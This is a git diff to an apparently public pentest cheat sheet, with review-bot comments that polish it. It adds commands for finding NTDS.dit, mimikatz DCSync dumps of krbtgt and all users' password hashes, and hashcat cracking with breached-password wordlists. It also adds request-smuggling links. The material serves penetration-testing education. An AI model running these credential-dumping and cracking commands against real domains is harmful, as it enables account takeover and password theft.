diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index eb80a30c..9af421ad 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -539,9 +539,19 @@ New-GPOImmediateTask -TaskName Debugging -GPODisplayName VulnGPO -CommandArgumen ### Dumping AD Domain Credentials You will need the following files to extract the ntds : -- ntds file (C:\Windows\NTDS\ntds.dit) +- NTDS.dit file - SYSTEM hive (C:\Windows\System32\SYSTEM) +Usually you can find the ntds in two locations : `systemroot\NTDS\ntds.dit` and `systemroot\System32\ntds.dit`. +- `systemroot\NTDS\ntds.dit` stores the database that is in use on a domain controller. It contains the values for the domain and a replica of the values for the forest (the Configuration container data). +- `systemroot\System32\ntds.dit` is the distribution copy of the default directory that is used when you install Active Directory on a server running Windows Server 2003 or later to create a domain controller. Because this file is available, you can run the Active Directory Installation Wizard without having to use the server operating system CD. + +However you can change the location to a custom one, you will need to query the registry to get the current location. + +```powershell +reg query HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v "DSA Database file" +``` + #### Using ndtsutil ```powershell 
@@ -653,7 +663,11 @@ cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. ```powershell +# DCSync only one user mimikatz# lsadump::dcsync /domain:htb.local /user:krbtgt + +# DCSync all users of the domain +mimikatz# lsadump::dcsync /domain:htb.local /all /csv ``` :warning: Read-Only Domain Controllers are not allowed to pull password data for users by default. @@ -668,6 +682,30 @@ sekurlsa::krbtgt lsadump::lsa /inject /name:krbtgt ``` +#### Crack NTLM hashes with hashcat + +Useful when you want to have the clear text password or when you need to make stats about weak passwords. + +Recommended wordlists: +- rockyou (available in Kali Linux) +- Have I Been Powned (https://hashes.org/download.php?hashlistId=7290&type=hfound) +- Collection #1 (passwords from Data Breaches, might be illegal to possess) + +```powershell +# Basic wordlist +# (-O) will Optimize for 32 characters or less passwords +# (-w 4) will set the workload to "Insane" +$ hashcat64.exe -m 1000 -w 4 -O -a 0 -o pathtopotfile pathtohashes pathtodico -r ./rules/best64.rule --opencl-device-types 1,2 + +# Generate a custom mask based on a wordlist +$ git clone https://github.com/iphelix/pack/blob/master/README +$ python2 statsgen.py ../hashcat.potfile -o hashcat.mask +$ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.hcmask +``` + +:warning: If the password is not a confidential data (challenges/ctf), you can use online "cracker" like : +- [hashes.org](https://hashes.org/check.php) +- [hashes.com](https://hashes.com/en/decrypt/hash) ### Password spraying diff --git a/Request Smuggling/README.md b/Request Smuggling/README.md index 845b74f2..d48b4b1a 100644 --- a/Request Smuggling/README.md +++ b/Request Smuggling/README.md 
@@ -2,11 +2,15 @@ ## Summary +* [Tools](#tools) * [CL.TE vulnerabilities](#cl.te-vulnerabilities) * [TE.CL vulnerabilities](#te.cl-vulnerabilities) * [TE.TE behavior: obfuscating the TE header](#te.te-behavior-obfuscating-the-te-header) * [References](#references) +## Tools + +* [HTTP Request Smuggler / BApp Store](https://portswigger.net/bappstore/aaaa60ef945341e8a450217a54a11646) ## CL.TE vulnerabilities @@ -101,3 +105,4 @@ Challenge: https://portswigger.net/web-security/request-smuggling/lab-ofuscating ## References * [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling) +* [A Pentester's Guide to HTTP Request Smuggling - Busra Demir - 2020, October 16](https://blog.cobalt.io/a-pentesters-guide-to-http-request-smuggling-8b7bf0db1f0) \ No newline at end of file
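Review bot: In the NTDS-location hunk (`Active Directory Attack.md`, `@@ -539,9 +539,19 @@`), `systemroot` is written as a bare word in the two paths and bullets while the SYSTEM hive line keeps the absolute `C:\Windows\System32\SYSTEM`; write it as `%SystemRoot%` so both lines visibly use the same convention. The sentence `However you can change the location to a custom one, you will need to query the registry to get the current location.` is a comma splice; suggest `Because the location can be changed, query the registry to find the one currently in use:` directly before the `reg query` block. The `reg query ... /v "DSA Database file"` line itself is the right value to read.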
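Review bot: The new `/all /csv` line in the DCSync hunk (`@@ -653,7 +663,11 @@`) introduces `/csv` without saying what it changes; add a comment such as `# /csv gives a compact one-account-per-line listing instead of the full per-user dump` so the reader knows why the flag is there. Minor: the fence is tagged `powershell` but the lines are `mimikatz#` prompt lines, which was already true of the context line; not a blocker.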
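Review bot: `git clone https://github.com/iphelix/pack/blob/master/README` in the hashcat hunk (`@@ -668,6 +682,30 @@`) is not a clonable URL (it is the web view of a file); it should be `git clone https://github.com/iphelix/pack`, and the two `python2` lines then run from inside the cloned directory, which is what the `../hashcat.potfile` relative path assumes. Two placeholders are misleading: `-o pathtopotfile` is hashcat's cracked-results output file, not the potfile (which hashcat manages itself via `--potfile-path`), so rename it `pathtooutfile`; and `statsgen.py` expects plaintext passwords, while potfile lines are `hash:plaintext`, so the plaintext column has to be cut out first (for example `cut -d: -f2 hashcat.potfile > cracked.txt` and feed `cracked.txt`). Style: the `$` prompts sit inside a `powershell` fence alongside `hashcat64.exe`; drop the `$` or change the fence. Spelling: `Have I Been Powned` should be `Have I Been Pwned`.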
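Review bot: The added reference line in `Request Smuggling/README.md` (`@@ -101,3 +105,4 @@`) is committed without a trailing newline (`\ No newline at end of file`); add one so the next appended entry does not show a spurious change on this line. The entry itself follows the existing `Title - Author - Date` convention of the list.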